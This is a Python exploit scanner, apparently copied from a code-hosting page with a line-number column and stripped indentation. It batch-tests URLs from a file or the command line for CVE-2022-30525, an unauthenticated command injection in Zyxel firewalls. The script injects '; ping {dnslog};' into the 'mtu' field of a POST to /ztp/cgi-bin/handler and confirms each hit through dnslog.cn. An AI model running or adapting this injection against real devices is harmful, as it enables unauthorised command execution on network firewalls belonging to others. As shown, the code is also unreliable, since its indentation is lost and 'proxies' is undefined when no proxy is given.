1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
|
import requests
import argparse
import sys
import urllib3
import json
import time
import random
import signal
dnslog_res = requests.session()
urllib3.disable_warnings()
__desc__ = 'CVE-2022-30525利用dnslog批量验证'
__author__ = 'savior'
__date__ = '2022/05/14'
__version__ = 'v0.1'
__link__ = 'https://github.com/savior-only/CVE-2022-30525'
def banner():
print("""
██████ ██ ██ ████████ ████ ████ ████ ████ ████ ████ ██████ ████ ██████
██░░░░██░██ ░██░██░░░░░ █░░░ █ █░░░██ █░░░ █ █░░░ █ █░░░ █ █░░░██░█░░░░ █░░░ █░█░░░░
██ ░░ ░██ ░██░██ ░ ░█░█ █░█░ ░█░ ░█ ░ ░█░█ █░█░█████ ░ ░█░█████
░██ ░░██ ██ ░███████ █████ ███ ░█ █ ░█ ███ ███ █████ ███ ░█ █ ░█░░░░░ █ ███ ░░░░░ █
░██ ░░██ ██ ░██░░░░ ░░░░░ █░░ ░██ ░█ █░░ █░░ ░░░░░ ░░░ █░██ ░█ ░█ █░░ ░█
░░██ ██ ░░████ ░██ █ ░█ ░█ █ █ █ ░█░█ ░█ █ ░█ █ █ ░█
░░██████ ░░██ ░████████ ░██████░ ████ ░██████░██████ ░ ████ ░ ████ ░ ████ ░██████░ ████
░░░░░░ ░░ ░░░░░░░░ ░░░░░░ ░░░░ ░░░░░░ ░░░░░░ ░░░░ ░░░░ ░░░░ ░░░░░░ ░░░░
by {} {}
{}
""".format(__author__, __version__, __link__))
class Dnslog:
def get_dnslog():
t = random.random()
url = f"http://www.dnslog.cn/getdomain.php?t={t}"
res1 = dnslog_res.get(url=url, proxies=proxies)
if res1.status_code == 200 and "dnslog" in res1.text:
dnslog = res1.text
return dnslog
else:
print("获取dnslog失败")
def get_data():
t = random.random()
url = f"http://www.dnslog.cn/getrecords.php?t={t}"
res2 = dnslog_res.get(url=url, proxies=proxies)
return res2.text
class information(object):
def __init__(self,args):
self.args = args
self.url = args.url
self.file = args.file
def target_url(self):
target_url = self.url + "/ztp/cgi-bin/handler"
headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0",
"Content-Type": "application/json"
}
dnslog = Dnslog.get_dnslog()
data = {"command": "setWanPortSt", "proto": "dhcp", "port": "4", "vlan_tagged": "1", "vlanid": "5", "mtu": f"; ping {dnslog};", "data": "hi"}
try:
res = requests.post(url=target_url, headers=headers, data=json.dumps(data), verify=False, proxies=proxies, timeout=5)
except Exception as e:
pass
time.sleep(5)
data = Dnslog.get_data()
if dnslog in data:
print(f"\033[31m[{chr(8730)}] 目标系统: {self.url} 存在Zyxel 防火墙未经身份验证的远程命令注入\033[0m")
print("[" + "-"*100 + "]")
else:
print(f"[\033[31mx\033[0m] 目标系统: {self.url} 不存在Zyxel 防火墙未经身份验证的远程命令注入!")
print("[" + "-"*100 + "]")
def file_url(self):
with open(self.file, "r") as urls:
for url in urls:
url = url.strip()
if url[:4] != "http":
url = "http://" + url
self.url = url.strip()
information.target_url(self)
if __name__ == "__main__":
try:
banner()
parser = argparse.ArgumentParser(description='Zyxel 防火墙未经身份验证的远程命令注入', add_help=False)
parser.add_argument("-h", "--help", action="help", help="Show this help message and exit")
parser.add_argument("-u", "--url", type=str, dest="url", help="Target url eg:\"http://127.0.0.1\"")
parser.add_argument("-f", "--file", dest="file", help="Targets in file eg:\"url.txt\"")
parser.add_argument("-proxy", dest="proxy", help="Proxy [socks5/socks4/http] (e.g. http://127.0.0.1:8080)")
args = parser.parse_args()
if args.proxy:
proxies = {"http": args.proxy, "https": args.proxy}
print("\033[31m[+] use proxy: {}\033[0m".format(args.proxy))
if args.url:
information(args).target_url()
elif args.file:
information(args).file_url()
except KeyboardInterrupt:
print("\n\033[31mYou choose to stop me.\033[0m")
|